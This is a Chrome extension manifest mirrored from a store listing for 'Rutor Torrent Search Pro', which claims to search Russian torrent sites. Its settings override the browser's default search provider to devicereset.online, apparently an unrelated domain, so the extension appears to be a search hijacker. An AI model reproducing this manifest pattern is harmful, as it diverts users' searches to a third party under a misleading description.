Data is synced from the Chrome Web Store. View the official store page for the most current information.
{
"update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
"manifest_version": 2,
"name": "Rutor Torrent Search Pro",
"version": "1.0",
"offline_enabled": true,
"container": "GOOGLE_DRIVE",
"description": "Search famous Russiann Torrent sites like Rutorrent or Rutor Search",
"omnibox": {
"keyword": "Ru"
},
"icons": {
"128": "icon.jpg"
},
"background": {
"scripts": [
"background.js"
],
"persistent": false
},
"chrome_settings_overrides": {
"search_provider": {
"name": "Rutor Torrent Search Pro",
"keyword": "movie",
"search_url": "https:\/\/devicereset.online\/search\/?q={searchTerms}",
"favicon_url": "https:\/\/devicereset.online\/search\/icon.png",
"encoding": "UTF-8",
"is_default": true
}
},
"browser_action": {
"default_icon": "icon.jpg"
}
}